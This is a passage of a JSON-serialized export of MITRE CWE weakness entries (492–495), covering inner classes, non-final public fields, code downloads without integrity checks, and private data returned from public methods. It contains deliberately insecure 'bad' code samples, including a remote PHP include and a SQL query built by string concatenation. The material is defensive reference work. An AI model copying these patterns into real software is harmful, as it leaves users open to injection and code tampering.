initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ActionListener adder = new ActionListener(){};Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","xhtml:br":["","","","","",""],"xhtml:i":"// anonymous inner class that implements the ActionListener interface","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent event){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount.this.balance += interest;","xhtml:br":["","","",""],"xhtml:i":["// update interest","double interest = BankAccount.this.balance * rate / 100;"]}}}}}}]}}}}]},{"Intro_Text":"In the following Java example a simple applet provides the capability for a user to input a URL into a text field and have the URL opened in a new browser window. The applet contains an inner class that is an action listener for the submit button, when the user clicks the submit button the inner class action listener\'s actionPerformed method will open the URL entered into the text field in a new browser window. As with the previous examples using inner classes in this manner creates a security risk by exposing private variables and methods. Inner classes create an additional security risk with applets as applets are executed on a remote machine through a web browser within the same JVM and therefore may run side-by-side with other potentially malicious code.","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"public class UrlToolApplet extends Applet {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton;public void init() {}private class SubmitButtonListener implements ActionListener {}","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// private member variables for applet components","// init method that adds components to applet","// and creates button listener object","// button listener inner class for UrlToolApplet class"],"xhtml:div":[{"#text":"setLayout(new FlowLayout());enterUrlLabel = new Label(\\"Enter URL: \\");enterUrlTextField = new TextField(\\"\\", 20);submitButton = new Button(\\"Submit\\");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);ActionListener submitButtonListener = new SubmitButtonListener();submitButton.addActionListener(submitButtonListener);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent evt) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (evt.getSource() == submitButton) {}","xhtml:div":{"#text":"String urlString = enterUrlTextField.getText();URL url = null;try {} catch (MalformedURLException e) {}if (url != null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"url = new URL(urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"Malformed URL: \\" + urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"getAppletContext().showDocument(url);","attr":{"@_style":"margin-left:10px;"}}]}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class UrlToolApplet extends Applet implements ActionListener {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton;public void init() {}public void actionPerformed(ActionEvent evt) {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private member variables for applet components","// init method that adds components to applet","// implementation of actionPerformed method of ActionListener interface"],"xhtml:div":[{"#text":"setLayout(new FlowLayout());enterUrlLabel = new Label(\\"Enter URL: \\");enterUrlTextField = new TextField(\\"\\", 20);submitButton = new Button(\\"Submit\\");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);submitButton.addActionListener(this);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (evt.getSource() == submitButton) {}","xhtml:div":{"#text":"String urlString = enterUrlTextField.getText();URL url = null;try {} catch (MalformedURLException e) {}if (url != null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"url = new URL(urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"Malformed URL: \\" + urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"getAppletContext().showDocument(url);","attr":{"@_style":"margin-left:10px;"}}]}}}]}}}}],"Body_Text":"As with the previous examples a solution to this problem would be to use a static inner class, a local inner class or an anonymous inner class. An alternative solution would be to have the applet implement the action listener rather than using it as an inner class as shown in the following example."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Use of Inner Class"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Publicizing of private data when using inner classes"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ08-J","Entry_Name":"Do not expose private members of an outer class from within a nested class"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Use of Inner Class","attr":{"@_Date":"2008-04-11"}}}},"493":{"attr":{"@_ID":"493","@_Name":"Critical Public Variable Without Final Modifier","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.","Extended_Description":"If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":["Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running.","Final provides security by only allowing non-mutable objects to be changed after being set. However, only objects which are not extended can be made final."]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The object could potentially be tampered with."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The object could potentially allow the object to be read."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Declare all public fields as final when possible, especially if it is used to maintain internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing the field from your code."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class WidgetData extends Applet {}","xhtml:div":{"#text":"public float price;...public WidgetData(...) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"this.price = LookupPrice(\\"MyWidgetType\\");","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData."},{"Intro_Text":"Assume the following code is intended to provide the location of a configuration file that controls execution of the application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":"public string configPath = \\"/etc/application/config.dat\\";"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"public String configPath = new String(\\"/etc/application/config.dat\\");"}],"Body_Text":"While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Non-Final Public Field"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to provide confidentiality for stored data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Non-final Public Field","attr":{"@_Date":"2008-04-11"}}}},"494":{"attr":{"@_ID":"494","@_Name":"Download of Code Without Integrity Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.","Extended_Description":"An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"79","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","Other"],"Note":"Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7.4"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use."]},"Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking."]}}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-42"},"Phase":"Implementation","Description":"Perform proper forward and reverse DNS lookups to detect DNS spoofing.","Effectiveness_Notes":"This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit."},{"Phase":["Architecture and Design","Operation"],"Description":{"xhtml:p":["Encrypt the code with a reliable encryption scheme before transmitting.","This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site."]}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Speficially, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["When providing the code that is to be downloaded, such as for automatic updates of the software, then use cryptographic signatures for the code and modify the download clients to verify the signatures. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses.","Use code signing technologies such as Authenticode. See references [REF-454] [REF-455] [REF-456]."]}}}},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example loads an external class from a local subdirectory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"URL[] classURLs= new URL[]{};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName(\\"loadMe\\", true, loader);","xhtml:div":{"#text":"new URL(\\"file:subdir/\\")","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}},"Body_Text":"This code does not ensure that the class loaded is the intended one, for example by verifying the class\'s checksum. An attacker may be able to modify the class file to execute malicious code."},{"Intro_Text":"This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username,$password){}","xhtml:i":"//assume the password is already encrypted, avoiding CWE-312","xhtml:br":["","",""],"xhtml:div":{"#text":"include(\\"http://external.example.com/dbInfo.php\\");mysql_connect($dbhost, $dbuser, $dbpass) or die (\'Error connecting to mysql\');mysql_select_db($dbname);$query = \'Select * from users where username=\'.$username.\' And password=\'.$password;$result = mysql_query($query);if(mysql_numrows($result) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""],"xhtml:i":"//dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available","xhtml:div":[{"#text":"mysql_close();return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"mysql_close();return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}},"Body_Text":["This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow themself to access the application without a real user account.","This example is also vulnerable to an Adversary-in-the-Middle AITM (CWE-300) attack."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9534","Description":"Satellite phone does not validate its firmware image.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9534"},{"Reference":"CVE-2021-22909","Description":"Chain: router\'s firmware update procedure uses curl with \\"-k\\" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909"},{"Reference":"CVE-2008-3438","Description":"OS does not verify authenticity of its own updates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3438"},{"Reference":"CVE-2008-3324","Description":"online poker client does not verify authenticity of its own updates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3324"},{"Reference":"CVE-2001-1125","Description":"anti-virus product does not verify automatic updates for itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1125"},{"Reference":"CVE-2002-0671","Description":"VOIP phone downloads applications from web sites without verifying integrity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0671"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Invoking untrusted mobile code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP27","Entry_Name":"Tainted input to environment"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"184"}},{"attr":{"@_CAPEC_ID":"185"}},{"attr":{"@_CAPEC_ID":"186"}},{"attr":{"@_CAPEC_ID":"187"}},{"attr":{"@_CAPEC_ID":"533"}},{"attr":{"@_CAPEC_ID":"657"}},{"attr":{"@_CAPEC_ID":"662"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-454"}},{"attr":{"@_External_Reference_ID":"REF-455"}},{"attr":{"@_External_Reference_ID":"REF-456"}},{"attr":{"@_External_Reference_ID":"REF-457"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 18: The Sins of Mobile Code." Page 267"}},{"attr":{"@_External_Reference_ID":"REF-459"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Mobile Code: Invoking Untrusted Mobile Code","attr":{"@_Date":"2008-04-11"}},{"#text":"Download of Untrusted Mobile Code Without Integrity Check","attr":{"@_Date":"2009-01-12"}}]}},"495":{"attr":{"@_ID":"495","@_Name":"Private Data Structure Returned From A Public Method","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The contents of the data structure can be modified from outside the intended scope."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Declare the method private."},{"Phase":"Implementation","Description":"Clone the member data and keep an unmodified version of the data private to the object."},{"Phase":"Implementation","Description":"Use public setter methods that govern how a private member can be modified."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Here, a public method in a Java class returns a reference to a private array. Given that arrays in Java are mutable, any modifications made to the returned reference would be reflected in the original private array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private String[] colors;public String[] getColors() {}","xhtml:br":"","xhtml:div":{"#text":"return colors;","attr":{"@_style":"margin-left:10px;"}}}}},{"Intro_Text":"In this example, the Color class defines functions that return non-const references to private members (an array type and an integer type), which are then arbitrarily altered from outside the control of the class.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class Color{};int main (){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"int[2] colorArray;int colorValue;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Color () : colorArray { 1, 2 }, colorValue (3) { };int[2] & fa () { return colorArray; }int & fv () { return colorValue; }","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":["// return reference to private array","// return reference to private integer"]}]},{"#text":"Color c;c.fa () [1] = 42;c.fv () = 42;return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":["// modifies private array element","// modifies private int"]}]}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Private Array-Typed Field Returned From A Public Method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content 